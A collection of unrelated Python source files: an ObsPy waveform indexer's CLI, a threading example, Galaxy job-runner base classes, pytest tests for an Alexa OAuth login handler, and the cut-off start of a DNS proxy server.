# prepare paths
if ',' in options.data:
paths = options.data.split(',')
else:
paths = [options.data]
paths = service._prepare_paths(paths)
if not paths:
return
# prepare map file
if options.mapping_file:
with open(options.mapping_file, 'r') as f:
data = f.readlines()
mappings = parse_mapping_data(data)
logging.info("Parsed %d lines from mapping file %s" %
(len(data), options.mapping_file))
else:
mappings = {}
# create file queue and worker processes
manager = multiprocessing.Manager()
in_queue = manager.dict()
work_queue = manager.list()
out_queue = manager.list()
log_queue = manager.list()
# spawn processes
for i in range(options.number_of_cpus):
args = (i, in_queue, work_queue, out_queue, log_queue, mappings)
p = multiprocessing.Process(target=worker, args=args)
p.daemon = True
p.start()
# connect to database
engine = create_engine(options.db_uri, encoding=native_str('utf-8'),
convert_unicode=True)
metadata = Base.metadata
# recreate database
if options.drop_database:
metadata.drop_all(engine, checkfirst=True)
metadata.create_all(engine, checkfirst=True)
# initialize database + options
_session = sessionmaker(bind=engine)
service.session = _session
service.options = options
service.mappings = mappings
# set queues
service.input_queue = in_queue
service.work_queue = work_queue
service.output_queue = out_queue
service.log_queue = log_queue
service.paths = paths
service._reset_walker()
service._step_walker()
service.serve_forever(options.poll_interval)
except KeyboardInterrupt:
quit()
logging.info("Indexer stopped.")
def main(argv=None):
parser = ArgumentParser(prog='obspy-indexer',
description='\n'.join(__doc__.split('\n')[:3]))
parser.add_argument('-V', '--version', action='version',
version="%(prog)s " + __version__)
parser.add_argument(
'-v', '--verbose', action='store_true',
help='Verbose output.')
parser.add_argument(
'-d', '--data', default='data=*.*',
help="""Path, search patterns and feature plug-ins of waveform files.
The indexer will crawl recursively through all sub-directories within each
given path. Multiple paths have to be separated with a comma, e.g.
'/first/path=*.*,/second/path,/third/path=*.gse'.
File patterns are given as space-separated list of wildcards after a equal
sign, e.g.
'/path=*.gse2 *.mseed,/second/path=*.*'.
Feature plug-ins may be added using the hash (#) character, e.g.
'/path=*.mseed#feature1#feature2,/second/path#feature2'.
Be aware that features must be provided behind file patterns (if any)! There is
no default feature enabled.
Default path option is 'data=*.*'.""")
parser.add_argument(
'-u', '--db-uri', default='sqlite:///indexer.sqlite',
help="Database connection URI, such as "
"postgresql://scott:tiger@localhost/mydatabase. "
"Default is a SQLite database './indexer.sqlite'.")
parser.add_argument(
'-n', type=int, dest='number_of_cpus',
help="Number of CPUs used for the indexer.",
default=multiprocessing.cpu_count())
parser.add_argument(
'-i', '--poll-interval', type=float, default=0.1,
help="Poll interval for file crawler in seconds (default is 0.1).")
parser.add_argument(
'-r', '--recent', type=int, default=0,
help="Index only recent files modified within the given "
"number of hours. This option is deactivated by default.")
parser.add_argument(
'-l', '--log', default='',
help="Log file name. If no log file is given, stdout will be used.")
parser.add_argument(
'-m', '--mapping-file', default=None,
help="Correct network, station, location and channel codes using a" +
" custom mapping file.")
parser.add_argument(
'-a', '--all-files', action='store_false', dest='skip_dots',
help="The indexer will automatically skip paths or "
"files starting with a dot. This option forces "
"parsing of all paths and files.")
parser.add_argument(
'-1', '--run-once', action='store_true',
help="The indexer will parse through all given directories only "
"once and quit afterwards.")
parser.add_argument(
'--check-duplicates', action='store_true',
help="Checks for duplicate entries within database. "
"This feature will slow down the indexer progress.")
parser.add_argument(
'--cleanup', action='store_true',
help="Clean database from non-existing files or paths " +
"if activated, but will skip all paths marked as " +
"archived in the database.")
parser.add_argument(
'-f', '--force-reindex', action='store_true',
help="Reindex existing index entry for every crawled file.")
parser.add_argument(
'--drop-database', action='store_true',
help="Deletes and recreates the complete database at start up.")
parser.add_argument(
'-H', '--host', default='localhost',
help="Server host name. Default is 'localhost'.")
parser.add_argument(
'-p', '--port', type=int, default=0,
help="Port number. If not given a free port will be picked.")
args = parser.parse_args(argv)
# set level of verbosity
if args.verbose:
level = logging.DEBUG
else:
level = logging.INFO
if args.log == "":
logging.basicConfig(stream=sys.stdout, level=level,
format="%(asctime)s [%(levelname)s] %(message)s")
else:
logging.basicConfig(filename=args.log, level=level,
format="%(asctime)s [%(levelname)s] %(message)s")
_run_indexer(args)
if __name__ == "__main__":
main()
|
thread6.py
|
# Python Program To Create A Thread That Act On The Objects Of A Class
# That Is Not Derived From The Thread Class
'''
Function Name : Creating Thread Without Sub Class To Thread Class
Function Date : 3 Oct 2020
Function Author : Prasad Dangare
Input : Integer
Output : Integer
'''
from threading import*
class MyThread:
# A Constructor
def __init__(self, str):
self.str = str
# A Method
def display(self, x, y):
print(self.str)
print('The args Are : ', x, y)
# Create An Instance To Our Class And Store 'Hello' String
obj = MyThread('Hello')
# Create A Thread To Run Display Method Of obj
t1 = Thread(target=obj.display, args=(1, 2))
# Run The Thread
t1.start()
|
__init__.py
|
"""
Base classes for job runner plugins.
"""
import os
import time
import string
import logging
import datetime
import threading
import subprocess
from Queue import Queue, Empty
import galaxy.jobs
from galaxy.jobs.command_factory import build_command
from galaxy import model
from galaxy.util import DATABASE_MAX_STRING_SIZE, shrink_stream_by_size
from galaxy.util import in_directory
from galaxy.util import ParamsWithSpecs
from galaxy.util import ExecutionTimer
from galaxy.util.bunch import Bunch
from galaxy.jobs.runners.util.job_script import write_script
from galaxy.jobs.runners.util.job_script import job_script
from galaxy.jobs.runners.util.env import env_to_statement
from .state_handler_factory import build_state_handlers
log = logging.getLogger( __name__ )
STOP_SIGNAL = object()
JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE = "Invalid job runner parameter for this plugin: %s"
JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE = "Job runner parameter '%s' value '%s' could not be converted to the correct type"
JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE = "Job runner parameter %s failed validation"
GALAXY_LIB_ADJUST_TEMPLATE = """GALAXY_LIB="%s"; if [ "$GALAXY_LIB" != "None" ]; then if [ -n "$PYTHONPATH" ]; then PYTHONPATH="$GALAXY_LIB:$PYTHONPATH"; else PYTHONPATH="$GALAXY_LIB"; fi; export PYTHONPATH; fi;"""
GALAXY_VENV_TEMPLATE = """GALAXY_VIRTUAL_ENV="%s"; if [ "$GALAXY_VIRTUAL_ENV" != "None" -a -z "$VIRTUAL_ENV" -a -f "$GALAXY_VIRTUAL_ENV/bin/activate" ]; then . "$GALAXY_VIRTUAL_ENV/bin/activate"; fi;"""
class RunnerParams( ParamsWithSpecs ):
def _param_unknown_error( self, name ):
raise Exception( JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE % name )
def _param_map_error( self, name, value ):
raise Exception( JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE % ( name, value ) )
def _param_vaildation_error( self, name, value ):
raise Exception( JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE % name )
class BaseJobRunner( object ):
DEFAULT_SPECS = dict( recheck_missing_job_retries=dict( map=int, valid=lambda x: x >= 0, default=0 ) )
def __init__( self, app, nworkers, **kwargs ):
"""Start the job runner
"""
self.app = app
self.sa_session = app.model.context
self.nworkers = nworkers
runner_param_specs = self.DEFAULT_SPECS.copy()
if 'runner_param_specs' in kwargs:
runner_param_specs.update( kwargs.pop( 'runner_param_specs' ) )
if kwargs:
log.debug( 'Loading %s with params: %s', self.runner_name, kwargs )
self.runner_params = RunnerParams( specs=runner_param_specs, params=kwargs )
self.runner_state_handlers = build_state_handlers()
def _init_worker_threads(self):
"""Start ``nworkers`` worker threads.
"""
self.work_queue = Queue()
self.work_threads = []
log.debug('Starting %s %s workers' % (self.nworkers, self.runner_name))
for i in range(self.nworkers):
worker = threading.Thread( name="%s.work_thread-%d" % (self.runner_name, i), target=self.run_next )
worker.setDaemon( True )
worker.start()
self.work_threads.append( worker )
def run_next(self):
"""Run the next item in the work queue (a job waiting to run)
"""
while True:
( method, arg ) = self.work_queue.get()
if method is STOP_SIGNAL:
return
# id and name are collected first so that the call of method() is the last exception.
try:
if isinstance(arg, AsynchronousJobState):
job_id = arg.job_wrapper.get_id_tag()
else:
# arg should be a JobWrapper/TaskWrapper
job_id = arg.get_id_tag()
except:
job_id = 'unknown'
try:
name = method.__name__
except:
name = 'unknown'
try:
method(arg)
except:
log.exception( "(%s) Unhandled exception calling %s" % ( job_id, name ) )
# Causes a runner's `queue_job` method to be called from a worker thread
def put(self, job_wrapper):
"""Add a job to the queue (by job identifier), indicate that the job is ready to run.
"""
put_timer = ExecutionTimer()
job = job_wrapper.get_job()
# Change to queued state before handing to worker thread so the runner won't pick it up again
job_wrapper.change_state( model.Job.states.QUEUED, flush=False, job=job )
# Persist the destination so that the job will be included in counts if using concurrency limits
job_wrapper.set_job_destination( job_wrapper.job_destination, None, flush=False, job=job )
self.sa_session.flush()
self.mark_as_queued(job_wrapper)
log.debug("Job [%s] queued %s" % (job_wrapper.job_id, put_timer))
def mark_as_queued(self, job_wrapper):
self.work_queue.put( ( self.queue_job, job_wrapper ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker threads
"""
log.info( "%s: Sending stop signal to %s worker threads" % ( self.runner_name, len( self.work_threads ) ) )
for i in range( len( self.work_threads ) ):
self.work_queue.put( ( STOP_SIGNAL, None ) )
# Most runners should override the legacy URL handler methods and destination param method
def url_to_destination(self, url):
"""
Convert a legacy URL to a JobDestination.
Job runner URLs are deprecated, JobDestinations should be used instead.
This base class method converts from a URL to a very basic
JobDestination without destination params.
"""
return galaxy.jobs.JobDestination(runner=url.split(':')[0])
def parse_destination_params(self, params):
"""Parse the JobDestination ``params`` dict and return the runner's native representation of those params.
"""
raise NotImplementedError()
def prepare_job(self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
modify_command_for_container=True):
"""Some sanity checks that all runners' queue_job() methods are likely to want to do
"""
job_id = job_wrapper.get_id_tag()
job_state = job_wrapper.get_state()
job_wrapper.is_ready = False
job_wrapper.runner_command_line = None
# Make sure the job hasn't been deleted
if job_state == model.Job.states.DELETED:
log.debug( "(%s) Job deleted by user before it entered the %s queue" % ( job_id, self.runner_name ) )
if self.app.config.cleanup_job in ( "always", "onsuccess" ):
job_wrapper.cleanup()
return False
elif job_state != model.Job.states.QUEUED:
log.info( "(%s) Job is in state %s, skipping execution" % ( job_id, job_state ) )
# cleanup may not be safe in all states
return False
# Prepare the job
try:
job_wrapper.prepare()
job_wrapper.runner_command_line = self.build_command_line(
job_wrapper,
include_metadata=include_metadata,
include_work_dir_outputs=include_work_dir_outputs,
modify_command_for_container=modify_command_for_container
)
except Exception as e:
log.exception("(%s) Failure preparing job" % job_id)
job_wrapper.fail( e.message if hasattr( e, 'message' ) else "Job preparation failed", exception=True )
return False
if not job_wrapper.runner_command_line:
job_wrapper.finish( '', '' )
return False
return True
# Runners must override the job handling methods
def queue_job(self, job_wrapper):
raise NotImplementedError()
def stop_job(self, job):
raise NotImplementedError()
def recover(self, job, job_wrapper):
raise NotImplementedError()
def build_command_line( self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
modify_command_for_container=True ):
container = self._find_container( job_wrapper )
if not container and job_wrapper.requires_containerization:
raise Exception("Failed to find a container when required, contact Galaxy admin.")
return build_command(
self,
job_wrapper,
include_metadata=include_metadata,
include_work_dir_outputs=include_work_dir_outputs,
modify_command_for_container=modify_command_for_container,
container=container
)
def get_work_dir_outputs( self, job_wrapper, job_working_directory=None, tool_working_directory=None ):
"""
Returns list of pairs (source_file, destination) describing path
to work_dir output file and ultimate destination.
"""
if tool_working_directory is not None and job_working_directory is not None:
raise Exception("get_work_dir_outputs called with both a job and tool working directory, only one may be specified")
if tool_working_directory is None:
if not job_working_directory:
job_working_directory = os.path.abspath( job_wrapper.working_directory )
tool_working_directory = os.path.join(job_working_directory, "working")
# Set up dict of dataset id --> output path; output path can be real or
# false depending on outputs_to_working_directory
output_paths = {}
for dataset_path in job_wrapper.get_output_fnames():
path = dataset_path.real_path
if self.app.config.outputs_to_working_directory:
path = dataset_path.false_path
output_paths[ dataset_path.dataset_id ] = path
output_pairs = []
# Walk job's output associations to find and use from_work_dir attributes.
job = job_wrapper.get_job()
job_tool = job_wrapper.tool
for (joda, dataset) in self._walk_dataset_outputs( job ):
if joda and job_tool:
hda_tool_output = job_tool.find_output_def( joda.name )
if hda_tool_output and hda_tool_output.from_work_dir:
# Copy from working dir to HDA.
# TODO: move instead of copy to save time?
source_file = os.path.join( tool_working_directory, hda_tool_output.from_work_dir )
destination = job_wrapper.get_output_destination( output_paths[ dataset.dataset_id ] )
if in_directory( source_file, tool_working_directory ):
output_pairs.append( ( source_file, destination ) )
else:
# Security violation.
log.exception( "from_work_dir specified a location not in the working directory: %s, %s" % ( source_file, job_wrapper.working_directory ) )
return output_pairs
def _walk_dataset_outputs( self, job ):
for dataset_assoc in job.output_datasets + job.output_library_datasets:
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations:
if isinstance( dataset, self.app.model.HistoryDatasetAssociation ):
joda = self.sa_session.query( self.app.model.JobToOutputDatasetAssociation ).filter_by( job=job, dataset=dataset ).first()
yield (joda, dataset)
# TODO: why is this not just something easy like:
# for dataset_assoc in job.output_datasets + job.output_library_datasets:
# yield (dataset_assoc, dataset_assoc.dataset)
# I don't understand the reworking it backwards. -John
def _handle_metadata_externally( self, job_wrapper, resolve_requirements=False ):
"""
Set metadata externally. Used by the Pulsar job runner where this
shouldn't be attached to command line to execute.
"""
# run the metadata setting script here
# this is terminate-able when output dataset/job is deleted
# so that long running set_meta()s can be canceled without having to reboot the server
if job_wrapper.get_state() not in [ model.Job.states.ERROR, model.Job.states.DELETED ] and job_wrapper.output_paths:
lib_adjust = GALAXY_LIB_ADJUST_TEMPLATE % job_wrapper.galaxy_lib_dir
venv = GALAXY_VENV_TEMPLATE % job_wrapper.galaxy_virtual_env
external_metadata_script = job_wrapper.setup_external_metadata( output_fnames=job_wrapper.get_output_fnames(),
set_extension=True,
tmp_dir=job_wrapper.working_directory,
# We don't want to overwrite metadata that was copied over in init_meta(), as per established behavior
kwds={ 'overwrite' : False } )
external_metadata_script = "%s %s %s" % (lib_adjust, venv, external_metadata_script)
if resolve_requirements:
dependency_shell_commands = self.app.datatypes_registry.set_external_metadata_tool.build_dependency_shell_commands(job_directory=job_wrapper.working_directory)
if dependency_shell_commands:
if isinstance( dependency_shell_commands, list ):
dependency_shell_commands = "&&".join( dependency_shell_commands )
external_metadata_script = "%s&&%s" % ( dependency_shell_commands, external_metadata_script )
log.debug( 'executing external set_meta script for job %d: %s' % ( job_wrapper.job_id, external_metadata_script ) )
external_metadata_proc = subprocess.Popen( args=external_metadata_script,
shell=True,
cwd=job_wrapper.working_directory,
env=os.environ,
preexec_fn=os.setpgrp )
job_wrapper.external_output_metadata.set_job_runner_external_pid( external_metadata_proc.pid, self.sa_session )
external_metadata_proc.wait()
log.debug( 'execution of external set_meta for job %d finished' % job_wrapper.job_id )
def get_job_file(self, job_wrapper, **kwds):
job_metrics = job_wrapper.app.job_metrics
job_instrumenter = job_metrics.job_instrumenters[ job_wrapper.job_destination.id ]
env_setup_commands = kwds.get( 'env_setup_commands', [] )
env_setup_commands.append( job_wrapper.get_env_setup_clause() or '' )
destination = job_wrapper.job_destination or {}
envs = destination.get( "env", [] )
envs.extend( job_wrapper.environment_variables )
for env in envs:
env_setup_commands.append( env_to_statement( env ) )
command_line = job_wrapper.runner_command_line
options = dict(
job_instrumenter=job_instrumenter,
galaxy_lib=job_wrapper.galaxy_lib_dir,
galaxy_virtual_env=job_wrapper.galaxy_virtual_env,
env_setup_commands=env_setup_commands,
working_directory=os.path.abspath( job_wrapper.working_directory ),
command=command_line,
shell=job_wrapper.shell,
)
# Additional logging to enable if debugging from_work_dir handling, metadata
# commands, etc... (or just peak in the job script.)
job_id = job_wrapper.job_id
log.debug( '(%s) command is: %s' % ( job_id, command_line ) )
options.update(**kwds)
return job_script(**options)
def write_executable_script( self, path, contents, mode=0o755 ):
write_script( path, contents, self.app.config, mode=mode )
def _find_container(
self,
job_wrapper,
compute_working_directory=None,
compute_tool_directory=None,
compute_job_directory=None,
):
job_directory_type = "galaxy" if compute_working_directory is None else "pulsar"
if not compute_working_directory:
compute_working_directory = job_wrapper.tool_working_directory
if not compute_job_directory:
compute_job_directory = job_wrapper.working_directory
if not compute_tool_directory:
compute_tool_directory = job_wrapper.tool.tool_dir
tool = job_wrapper.tool
from galaxy.tools.deps import containers
tool_info = containers.ToolInfo(tool.containers, tool.requirements)
job_info = containers.JobInfo(
compute_working_directory,
compute_tool_directory,
compute_job_directory,
job_directory_type,
)
destination_info = job_wrapper.job_destination.params
return self.app.container_finder.find_container(
tool_info,
destination_info,
job_info
)
def _handle_runner_state( self, runner_state, job_state ):
try:
for handler in self.runner_state_handlers.get(runner_state, []):
handler(self.app, self, job_state)
if job_state.runner_state_handled:
break
except:
log.exception('Caught exception in runner state handler:')
def mark_as_resubmitted( self, job_state, info=None ):
job_state.job_wrapper.mark_as_resubmitted( info=info )
if not self.app.config.track_jobs_in_database:
job_state.job_wrapper.change_state( model.Job.states.QUEUED )
self.app.job_manager.job_handler.dispatcher.put( job_state.job_wrapper )
class JobState( object ):
"""
Encapsulate state of jobs.
"""
runner_states = Bunch(
WALLTIME_REACHED='walltime_reached',
MEMORY_LIMIT_REACHED='memory_limit_reached',
GLOBAL_WALLTIME_REACHED='global_walltime_reached',
OUTPUT_SIZE_LIMIT='output_size_limit'
)
def __init__( self ):
self.runner_state_handled = False
def set_defaults( self, files_dir ):
if self.job_wrapper is not None:
id_tag = self.job_wrapper.get_id_tag()
if files_dir is not None:
self.job_file = JobState.default_job_file( files_dir, id_tag )
self.output_file = os.path.join( files_dir, 'galaxy_%s.o' % id_tag )
self.error_file = os.path.join( files_dir, 'galaxy_%s.e' % id_tag )
self.exit_code_file = os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
job_name = 'g%s' % id_tag
if self.job_wrapper.tool.old_id:
job_name += '_%s' % self.job_wrapper.tool.old_id
if self.job_wrapper.user:
job_name += '_%s' % self.job_wrapper.user
self.job_name = ''.join( map( lambda x: x if x in ( string.letters + string.digits + '_' ) else '_', job_name ) )
@staticmethod
def default_job_file( files_dir, id_tag ):
return os.path.join( files_dir, 'galaxy_%s.sh' % id_tag )
@staticmethod
def default_exit_code_file( files_dir, id_tag ):
return os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
class AsynchronousJobState( JobState ):
"""
Encapsulate the state of an asynchronous job, this should be subclassed as
needed for various job runners to capture additional information needed
to communicate with distributed resource manager.
"""
def __init__( self, files_dir=None, job_wrapper=None, job_id=None, job_file=None, output_file=None, error_file=None, exit_code_file=None, job_name=None, job_destination=None ):
super( AsynchronousJobState, self ).__init__()
self.old_state = None
self._running = False
self.check_count = 0
self.start_time = None
self.job_wrapper = job_wrapper
# job_id is the DRM's job id, not the Galaxy job id
self.job_id = job_id
self.job_destination = job_destination
self.job_file = job_file
self.output_file = output_file
self.error_file = error_file
self.exit_code_file = exit_code_file
self.job_name = job_name
self.set_defaults( files_dir )
self.cleanup_file_attributes = [ 'job_file', 'output_file', 'error_file', 'exit_code_file' ]
@property
def running( self ):
return self._running
@running.setter
def running( self, is_running ):
self._running = is_running
# This will be invalid for job recovery
if self.start_time is None:
self.start_time = datetime.datetime.now()
def check_limits( self, runtime=None ):
limit_state = None
if self.job_wrapper.has_limits():
self.check_count += 1
if self.running and (self.check_count % 20 == 0):
if runtime is None:
runtime = datetime.datetime.now() - (self.start_time or datetime.datetime.now())
self.check_count = 0
limit_state = self.job_wrapper.check_limits( runtime=runtime )
if limit_state is not None:
# Set up the job for failure, but the runner will do the actual work
self.runner_state, self.fail_message = limit_state
self.stop_job = True
return True
return False
def cleanup( self ):
for file in [ getattr( self, a ) for a in self.cleanup_file_attributes if hasattr( self, a ) ]:
try:
os.unlink( file )
except Exception as e:
log.debug( "(%s/%s) Unable to cleanup %s: %s" % ( self.job_wrapper.get_id_tag(), self.job_id, file, str( e ) ) )
def register_cleanup_file_attribute( self, attribute ):
if attribute not in self.cleanup_file_attributes:
self.cleanup_file_attributes.append( attribute )
class AsynchronousJobRunner( BaseJobRunner ):
"""Parent class for any job runner that runs jobs asynchronously (e.g. via
a distributed resource manager). Provides general methods for having a
thread to monitor the state of asynchronous jobs and submitting those jobs
to the correct methods (queue, finish, cleanup) at appropriate times..
"""
def __init__( self, app, nworkers, **kwargs ):
super( AsynchronousJobRunner, self ).__init__( app, nworkers, **kwargs )
# 'watched' and 'queue' are both used to keep track of jobs to watch.
# 'queue' is used to add new watched jobs, and can be called from
# any thread (usually by the 'queue_job' method). 'watched' must only
# be modified by the monitor thread, which will move items from 'queue'
# to 'watched' and then manage the watched jobs.
self.watched = []
self.monitor_queue = Queue()
def _init_monitor_thread(self):
self.monitor_thread = threading.Thread( name="%s.monitor_thread" % self.runner_name, target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def handle_stop(self):
# DRMAA and SGE runners should override this and disconnect.
pass
def monitor( self ):
"""
Watches jobs currently in the monitor queue and deals with state
changes (queued to running) and job completion.
"""
while True:
# Take any new watched jobs and put them on the monitor list
try:
while True:
async_job_state = self.monitor_queue.get_nowait()
if async_job_state is STOP_SIGNAL:
# TODO: This is where any cleanup would occur
self.handle_stop()
return
self.watched.append( async_job_state )
except Empty:
pass
# Iterate over the list of watched jobs and check state
try:
self.check_watched_items()
except Exception:
log.exception('Unhandled exception checking active jobs')
# Sleep a bit before the next state check
time.sleep( 1 )
def monitor_job(self, job_state):
self.monitor_queue.put( job_state )
def shutdown( self ):
"""Attempts to gracefully shut down the monitor thread"""
log.info( "%s: Sending stop signal to monitor thread" % self.runner_name )
self.monitor_queue.put( STOP_SIGNAL )
# Call the parent's shutdown method to stop workers
super( AsynchronousJobRunner, self ).shutdown()
def check_watched_items(self):
"""
This method is responsible for iterating over self.watched and handling
state changes and updating self.watched with a new list of watched job
states. Subclasses can opt to override this directly (as older job runners will
initially) or just override check_watched_item and allow the list processing to
reuse the logic here.
"""
new_watched = []
for async_job_state in self.watched:
new_async_job_state = self.check_watched_item(async_job_state)
if new_async_job_state:
new_watched.append(new_async_job_state)
self.watched = new_watched
# Subclasses should implement this unless they override check_watched_items all together.
def check_watched_item(self, job_state):
raise NotImplementedError()
def finish_job( self, job_state ):
"""
Get the output/error for a finished job, pass to `job_wrapper.finish`
and cleanup all the job's temporary files.
"""
galaxy_id_tag = job_state.job_wrapper.get_id_tag()
external_job_id = job_state.job_id
# To ensure that files below are readable, ownership must be reclaimed first
job_state.job_wrapper.reclaim_ownership()
# wait for the files to appear
which_try = 0
while which_try < (self.app.config.retry_job_output_collection + 1):
try:
stdout = shrink_stream_by_size( open( job_state.output_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
stderr = shrink_stream_by_size( open( job_state.error_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
which_try = (self.app.config.retry_job_output_collection + 1)
except Exception as e:
if which_try == self.app.config.retry_job_output_collection:
stdout = ''
stderr = 'Job output not returned from cluster'
log.error( '(%s/%s) %s: %s' % ( galaxy_id_tag, external_job_id, stderr, str( e ) ) )
else:
time.sleep(1)
which_try += 1
try:
# This should be an 8-bit exit code, but read ahead anyway:
exit_code_str = open( job_state.exit_code_file, "r" ).read(32)
except:
# By default, the exit code is 0, which typically indicates success.
exit_code_str = "0"
try:
# Decode the exit code. If it's bogus, then just use 0.
exit_code = int(exit_code_str)
except:
log.warning( "(%s/%s) Exit code '%s' invalid. Using 0." % ( galaxy_id_tag, external_job_id, exit_code_str ) )
exit_code = 0
# clean up the job files
cleanup_job = job_state.job_wrapper.cleanup_job
if cleanup_job == "always" or ( not stderr and cleanup_job == "onsuccess" ):
job_state.cleanup()
try:
job_state.job_wrapper.finish( stdout, stderr, exit_code )
except:
log.exception( "(%s/%s) Job wrapper finish method failed" % ( galaxy_id_tag, external_job_id ) )
job_state.job_wrapper.fail( "Unable to finish job", exception=True )
def fail_job( self, job_state ):
if getattr( job_state, 'stop_job', True ):
self.stop_job( self.sa_session.query( self.app.model.Job ).get( job_state.job_wrapper.job_id ) )
self._handle_runner_state( 'failure', job_state )
# Not convinced this is the best way to indicate this state, but
# something necessary
if not job_state.runner_state_handled:
job_state.job_wrapper.fail( getattr( job_state, 'fail_message', 'Job failed' ) )
if job_state.job_wrapper.cleanup_job == "always":
job_state.cleanup()
def mark_as_finished(self, job_state):
self.work_queue.put( ( self.finish_job, job_state ) )
def mark_as_failed(self, job_state):
self.work_queue.put( ( self.fail_job, job_state ) )
|
test_handlers.py
|
import re
import threading
import urllib
import pytest
import requests
from avs_client.refreshtoken import handlers, helpers, http_server
@pytest.fixture(scope='session')
def server():
return http_server.AmazonLoginHttpServer(
server_address=('localhost', 9000),
RequestHandlerClass=handlers.AmazonAlexaServiceLoginHandler,
client_id='client-id-here',
client_secret='client-secret-here',
device_type_id='device-type-id-here',
callback_url='http://localhost:9000/callback/',
)
@pytest.fixture(scope='session')
def background_server(server):
def thread_function():
server.serve_forever()
thread = threading.Thread(target=thread_function)
thread.start()
try:
yield
finally:
thread._is_stopped = True
@pytest.fixture
def amazon_request_200(requests_mocker):
return requests_mocker.post(
url=helpers.AmazonOauth2RequestManager.authorization_grant_url,
status_code=200,
json={
'refresh_token': 'my-refresh-token'
}
)
@pytest.fixture
def amazon_request_401(requests_mocker):
return requests_mocker.post(
url=helpers.AmazonOauth2RequestManager.authorization_grant_url,
status_code=401,
text='oops!'
)
@pytest.fixture(autouse=True)
def allow_local_server_request(requests_mocker):
requests_mocker.register_uri(
'GET', re.compile('http://localhost:9000/'), real_http=True
)
def test_routes_to_login(background_server):
response = requests.get('http://localhost:9000/', allow_redirects=False)
url = urllib.parse.unquote_plus(response.headers['Location'])
assert url == (
'https://www.amazon.com/ap/oa?client_id=client-id-here&'
'scope=alexa:all&''scope_data={"alexa:all": {"productID": '
'"device-type-id-here", "productInstanceAttributes": '
'{"deviceSerialNumber": "001"}}}&response_type=code&'
'redirect_uri=http://localhost:9000/callback/'
)
def test_routes_to_404(background_server):
response = requests.get('http://localhost:9000/a', allow_redirects=False)
assert response.status_code == 404
def test_handle_callback_amazon_request(
background_server, amazon_request_200, requests_mocker
):
requests.get('http://localhost:9000/callback/?code=my-code')
amazon_request = requests_mocker.request_history[1]
assert amazon_request.json() == {
'client_id': 'client-id-here',
'client_secret': 'client-secret-here',
'code': 'my-code',
'grant_type': 'authorization_code',
'redirect_uri': 'http://localhost:9000/callback/',
}
def test_handle_callback_200_response(background_server, amazon_request_200):
response = requests.get('http://localhost:9000/callback/?code=my-code')
assert response.status_code == 200
assert response.content == b'refresh_token: my-refresh-token'
def test_handle_callback_non_200(background_server, amazon_request_401):
response = requests.get('http://localhost:9000/callback/?code=my-code')
assert response.status_code == 401
assert response.content == b'oops!'
|
z.DNS.py
|
from SocketServer import BaseRequestHandler, ThreadingUDPServer , StreamRequestHandler , ThreadingTCPServer
from cStringIO import StringIO
from fnmatch import fnmatch
import os
import socket
import struct
import time , thread , threading
import re
import sys
DNS_TYPE_A = 1
DNS_CLASS_IN = 1
DNS_CONFIG_FILE = 'dns.conf'
DNS_HOSTS_FILE = 'dns.hosts'
DNS_SWITCH_FILE = 'dns.switch'
DNS_LOCAL_PATH = '.\\'
reg_IP = '((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)'
ALL_LOG_LOCK = thread.allocate_lock()
SWI_LOG_LOCK = thread.allocate_lock()
dnsserver = [None,None]
def check_file():
old_info = ( os.stat("dns.conf").st_mtime ,os.stat("dns.hosts").st_mtime ,os.stat("dns.switch").st_mtime )
while dnsserver[0].isRun() :
time.sleep(60)
tmp_info = ( os.stat("dns.conf").st_mtime ,os.stat("dns.hosts").st_mtime ,os.stat("dns.switch").st_mtime )
if old_info != tmp_info :
dnsserver[0].reLoad()
old_info = tmp_info
if (not dnsserver[0].isRun()):
dnsserver[1].killServer()
class dns_server(threading.Thread):
dnsserver = None
over = False
def __init__(self):
threading.Thread.__init__(self)
def run(self):
while not self.over:
self.dnsserver = DNSProxyServer()
self.dnsserver.serve_forever()
def reLoad(self):
if not self.over:
self.dnsserver.shutdown()
self.dnsserver.server_close()
os.system("ipconfig /flushdns")
def killServer(self):
if not self.over:
self.over = True
self.dnsserver.shutdown()
self.dnsserver.server_close()
def isRun(self):
return not self.over
class dns_server_ByTCP(threading.Thread):
dnsserver = None
over = False
def __init__(self):
threading.Thread.__init__(self)
def run(self):
while not self.over:
self.dnsserver = DNSProxyServer_ByTCP()
self.dnsserver.serve_forever()
def killServer(self):
if not self.over:
self.over = True
self.dnsserver.shutdown()
self.dnsserver.server_close()
def main():
dnsserver[0] = dns_server()
dnsserver[0].start()
dnsserver[1] = dns_server_ByTCP()
dnsserver[1].start()
checkfile = threading.Thread(target = check_file , args =())
checkfile.start()
class Struct(object):
def __init__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
def parse_dns_message(data):
message = StringIO(data)
message.seek(4)
c_qd, c_an, c_ns, c_ar = struct.unpack('!4H', message.read(8))
question = parse_dns_question(message)
for i in range(1, c_qd):
parse_dns_question(message)
records = []
for i in range(c_an+c_ns+c_ar):
records.append(parse_dns_record(message))
return Struct(question=question, records=records)
def parse_dns_question(message):
qname = parse_domain_name(message)
qtype, qclass = struct.unpack('!HH', message.read(4))
end_offset = message.tell()
return Struct(name=qname, type_=qtype, class_=qclass, end_offset=end_offset)
def parse_dns_record(message):
parse_domain_name(message)
message.seek(4, os.SEEK_CUR)
ttl_offset = message.tell()
ttl = struct.unpack('!I', message.read(4))[0]
rd_len = struct.unpack('!H', message.read(2))[0]
message.seek(rd_len, os.SEEK_CUR)
return Struct(ttl_offset=ttl_offset, ttl=ttl)
def _parse_domain_labels(message):
labels = []
len = ord(message.read(1))
